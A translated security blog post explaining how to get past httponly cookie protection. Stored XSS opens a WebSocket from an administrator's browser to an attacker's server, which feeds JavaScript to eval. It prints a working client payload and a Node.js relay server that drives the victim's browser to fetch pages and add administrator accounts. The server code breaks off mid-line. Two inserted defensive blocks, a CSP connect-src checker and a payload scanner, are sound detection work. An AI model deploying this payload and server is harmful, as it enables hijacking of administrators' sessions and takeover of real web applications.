How to analyze Websocket Source Code Mapping in httponly

2025-03-26 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

Many newcomers are not clear about how to analyze httponly WebSocket source code mapping. To help with that, the editor explains it in detail below; anyone who needs it is welcome to follow along, and hopefully you will take something away from it.

0x00 Preface

In black-box XSS testing, httponly is a real headache: it protects the administrator's cookie. The author's view is that a very reliable option is to analyze the backend source code and then build a new XSS payload that adds an administrator user through Ajax. But that tests the attacker's JavaScript skill. If the JS has a few more layers of interesting encryption, the attacker has to decrypt it step by step and then audit the JS step by step. Moreover, the source code obtained through XSS is one-shot: if the audit never reaches the key code, that XSS only paves the way for the next one. Keep triggering XSS, keep waiting for the administrator to take the bait, construct a payload, send the XSS payload, then wait for the administrator to take the bait again. Just thinking about it gives you a headache, and the white hat sheds two lines of tears. The technique described here lets you send an "add administrator" XSS payload with ease, without having to audit the JS at all, let alone hand-craft the payload.

0x01 Obtaining Source Code Information with Ordinary XSS

Let's first look at the payload that ordinary XSS uses to obtain source code information.

This is what the author found through a Baidu search. You can see that obtaining the source code means sending an Ajax request and then delivering the fetched source code to the attacker's server.

Because HTTP is strictly one request and one response, if we want to do it once and for all (a single XSS does everything), we might as well take advantage of WebSocket.

0x02 Fetching Multiple Pages over WebSocket

Let's stop here and think carefully. If we connect the administrator's browser to the attacker's server through WebSocket, reverse the roles so that the administrator's browser acts as a server for the attacker's server, and then have the attacker's server ask the administrator's browser to send source code many times, does that achieve the effect of one XSS fetching many pages?

What? Still not clear? Then look at the picture below.

Here B is the victim, A is the WebSocket, and C is the attacker; C repeatedly asks A to hand over the money (the source code). WebSocket takes the role of the middleman: it is a bridge between the victim and the attacker (TCP without the HTTP protocol on top).
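The channel described above only works if the administrator's page is allowed to open a WebSocket to the attacker's host, which is exactly what the Content-Security-Policy connect-src directive governs. The following is an added example, not code from the original post: a simplified Node.js model of the CSP source matching a browser applies to new WebSocket(url), so a defender can check whether a given policy would block an endpoint such as the ws://127.0.0.1:5555/ address used later in the article. The origin https://admin.example, the policies and the sample URLs are constructed for the example; the matcher follows the CSP3 source-matching rules for 'self', scheme sources and host sources, and omits path parts, redirects and nonce or hash sources.

```javascript
// Added example (not from the original post): a simplified model of the
// Content-Security-Policy check a browser applies before page script may
// open `new WebSocket(url)`. The governing directive is connect-src, with
// default-src as the fallback. Origins, policies and URLs are constructed.

function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Default port for a scheme, used when a URL or source expression omits it.
function defaultPort(protocol) {
  return { 'http:': '80', 'ws:': '80', 'https:': '443', 'wss:': '443' }[protocol] || '';
}

// CSP3 scheme matching: an insecure scheme in the policy also admits its
// secure upgrade, so "ws:" covers wss:, http: and https: as well.
function schemeMatches(policyScheme, urlScheme) {
  if (policyScheme === urlScheme) return true;
  if (policyScheme === 'http:' && urlScheme === 'https:') return true;
  if (policyScheme === 'ws:' && ['wss:', 'http:', 'https:'].includes(urlScheme)) return true;
  if (policyScheme === 'wss:' && urlScheme === 'https:') return true;
  return false;
}

function hostMatches(pattern, host) {
  if (pattern === '*') return true;
  if (pattern.startsWith('*.')) {
    const suffix = pattern.slice(1); // "*.example" -> ".example"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

// Does a single source expression admit the target URL for a page at pageOrigin?
function sourceMatches(expr, target, pageOrigin) {
  const lower = expr.toLowerCase();
  const page = new URL(pageOrigin);
  const targetPort = target.port || defaultPort(target.protocol);
  if (lower === "'self'") {
    const pagePort = page.port || defaultPort(page.protocol);
    return target.hostname === page.hostname && targetPort === pagePort &&
      (target.protocol === page.protocol || target.protocol === 'https:' || target.protocol === 'wss:');
  }
  if (lower.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes: never a host
  if (/^[a-z][a-z0-9+.-]*:$/.test(lower)) return schemeMatches(lower, target.protocol); // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*:)\/\/)?([^\/:]+)(?::(\d+|\*))?(?:\/.*)?$/.exec(lower);
  if (!m) return false;
  const [, scheme, hostPattern, port] = m;
  if (!schemeMatches(scheme || page.protocol, target.protocol)) return false;
  if (!hostMatches(hostPattern, target.hostname)) return false;
  if (port === '*') return true;
  if (port) return port === targetPort;
  return targetPort === defaultPort(target.protocol); // no port given: only the scheme's default port
}

// Would this policy let a page at pageOrigin open a WebSocket to wsUrl?
function cspAllowsWebSocket(header, pageOrigin, wsUrl) {
  const directives = parseCsp(header);
  const sources = directives['connect-src'] || directives['default-src'];
  if (!sources) return true; // no governing directive: the browser imposes no restriction
  const target = new URL(wsUrl);
  return sources.some(expr => sourceMatches(expr, target, pageOrigin));
}

// Stand-alone demo against the endpoint used by the payload later in the article.
const DEMO_POLICY = "default-src 'self'; connect-src 'self' wss://*.example";
for (const u of ['ws://127.0.0.1:5555/', 'wss://admin.example/live']) {
  console.log(u, cspAllowsWebSocket(DEMO_POLICY, 'https://admin.example', u) ? 'allowed' : 'blocked');
}
```

The useful observation is the last branch of cspAllowsWebSocket: a policy with only script-src, or no policy at all, leaves the WebSocket unrestricted, and a scheme-only entry such as connect-src ws: is no better. Pinning connect-src to 'self' or to named hosts is what closes the channel.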

0x03 The Idea of WebSocket Source Code Mapping

Since we can fetch multiple pages, and we don't like to audit JS (the author clearly doesn't) and then construct the payload by hand, we prefer to take it easy. So just fuzz the source code (fuzz it locally).

Here the author teases you a little (clearly just for self-amusement); first the author pastes the mind map.

In other words, we can fetch multiple pages of source code, then pull in all of the target's CSS and JS by referencing them externally, because the CSS styling and the JS matter to us. Then go through the local copy of the source code to see whether there is an "add administrator" function; since the various JS and CSS files have been included, the form request can be sent. We then locate the "add administrator" function by fuzzing and add the user by fuzzing: over WebSocket we tell the administrator's browser, "I'm going to send an Ajax request that adds an administrator," and the administrator's browser sends it. That way you don't need a JS audit at all.

0x04 Implementation of WebSocket Source Code Mapping

Of course, talking on paper is useless. Let's build it together.

WebSocket XSS Payload:

var ws = new WebSocket('ws://127.0.0.1:5555/'); // the attacker's WebSocket server
ws.addEventListener('message', (data) => {
  try {
    eval(data.data)
  } catch (e) {
    console.log('code execution error')
  }
});
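From the defender's side, the payload above has a recognisable shape: a WebSocket opened to a host the application does not own, plus a message handler that passes whatever arrives straight to eval. The following is an added example, not part of the original post: a small Node.js scanner that flags those two ingredients in stored content (comments, profile fields, templates) before it is rendered to an administrator. The list of owned hosts (admin.example), the finding names and the sample inputs are constructed; one sample is a reproduction of the payload above, the other a benign same-origin notifications socket.

```javascript
// Added example (not from the original post): a static check for stored
// content that carries the two ingredients of the payload above, a WebSocket
// to a host the application does not own and a message handler that feeds
// what it receives to dynamic code evaluation. Host list, finding names and
// the sample inputs are constructed for this example.

const WS_CALL = /new\s+WebSocket\s*\(\s*(['"`])([^'"`]*)\1/g;
const MESSAGE_HANDLER = /\.addEventListener\s*\(\s*['"`]message['"`]|\.onmessage\s*=/;
const DYNAMIC_EVAL = /\beval\s*\(|new\s+Function\s*\(|\b(?:setTimeout|setInterval)\s*\(\s*['"`]/;

function scanForWebSocketEval(source, ownHosts) {
  const own = new Set(ownHosts.map(h => h.toLowerCase()));
  const findings = [];
  const re = new RegExp(WS_CALL.source, 'g'); // fresh lastIndex on every call
  let m;
  while ((m = re.exec(source)) !== null) {
    const rawUrl = m[2];
    let host = null;
    try { host = new URL(rawUrl).hostname.toLowerCase(); } catch (e) { /* relative or malformed */ }
    if (host === null) {
      findings.push({ kind: 'websocket-relative-or-invalid', detail: rawUrl });
    } else if (!own.has(host)) {
      findings.push({ kind: 'websocket-foreign-host', detail: host });
    }
  }
  if (MESSAGE_HANDLER.test(source) && DYNAMIC_EVAL.test(source)) {
    findings.push({ kind: 'message-to-eval', detail: 'message handler together with eval/Function/string timer' });
  }
  return findings;
}

// The combination is what matters: a foreign socket alone may be a legitimate
// third-party feed and eval alone is merely bad practice; together they form
// a remote control channel of the kind described in the article.
function isRemoteControlPattern(findings) {
  const kinds = new Set(findings.map(f => f.kind));
  return kinds.has('websocket-foreign-host') && kinds.has('message-to-eval');
}

// Constructed samples: a reproduction of the payload above, and a benign feed.
const SAMPLE_PAYLOAD = `var ws = new WebSocket('ws://127.0.0.1:5555/');
ws.addEventListener('message', (data) => { try { eval(data.data) } catch (e) {} });`;

const SAMPLE_BENIGN = `const feed = new WebSocket('wss://admin.example/notifications');
feed.onmessage = (ev) => render(JSON.parse(ev.data));`;

const OWN_HOSTS = ['admin.example']; // constructed: the hosts the application legitimately serves

for (const [label, src] of [['payload', SAMPLE_PAYLOAD], ['benign', SAMPLE_BENIGN]]) {
  const f = scanForWebSocketEval(src, OWN_HOSTS);
  console.log(label, isRemoteControlPattern(f) ? 'FLAG' : 'ok', JSON.stringify(f));
}
```

This is a string-level check, so it is a triage signal rather than a parser: obfuscated payloads that assemble the WebSocket URL at runtime will slip past it, which is why the connect-src policy remains the control that actually stops the channel, and this scanner is best used to alert on stored content that reaches an administrator's pages.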

Here the author uses a server written in Node.js. There is a reason for that: Node.js can listen on multiple ports from a single file, and the second route can be specified freely, which is very convenient. So the author uses Node.js here.

Server code:

let ws = require('nodejs-websocket')
let http = require('http')
let url = require('url')
let resStr = ''

// WebSocket side: each connected browser is first asked for its own page,
// and whatever it sends back is kept in resStr for the HTTP side to return.
let server = ws.createServer(connect => {
  connect.send(createString('GET', `' + location.href + '`))
  connect.on('text', (data) => {
    resStr = data
  });
  connect.on('error', () => {})
  connect.on('close', () => {})
});
server.listen(5555)

// HTTP side: /heihu577?cmd=... broadcasts raw JS; any other GET or POST is
// relayed as an XMLHttpRequest and answered with the last received page.
let httpServer = http.createServer((request, response) => {
  if (request.url == '/favicon.ico') {
    return
  }
  response.writeHead(200, { 'Content-Type': 'text/html;charset=utf8' })
  if (url.parse(request.url).pathname == '/heihu577') {
    let querystring = url.parse(request.url, true)
    let cmd = querystring.query.cmd
    console.log(querystring.query)
    if (cmd != '') {
      guangbo(cmd)
    }
    response.end('ok')
  } else if (request.method.toLowerCase() == 'get') {
    guangbo(createString('GET', request.url))
    response.end(resStr)
  } else if (request.method.toLowerCase() == 'post') {
    let tmpStr = ''
    request.addListener('data', (chunk) => {
      tmpStr += chunk
    });
    request.addListener('end', () => {
      guangbo(createString('POST', request.url, tmpStr))
      response.end(resStr)
    });
  }
});
httpServer.listen(6666)

// Broadcast a string to every connected WebSocket client.
function guangbo(data) {
  server.connections.forEach(item => {
    item.send(data)
  });
}

// Build the JS that the client will eval: an XMLHttpRequest whose response is sent back over ws.
function createString(method, url, options = '') {
  switch (method) {
    case 'GET':
      str = `let xml = new XMLHttpRequest(); xml.open('${method}', '${url}'); xml.send(null); xml.onreadystatechange = function () { if (this.status == '200' && this.readyState == '4') { ws.send(this.responseText.replace(/
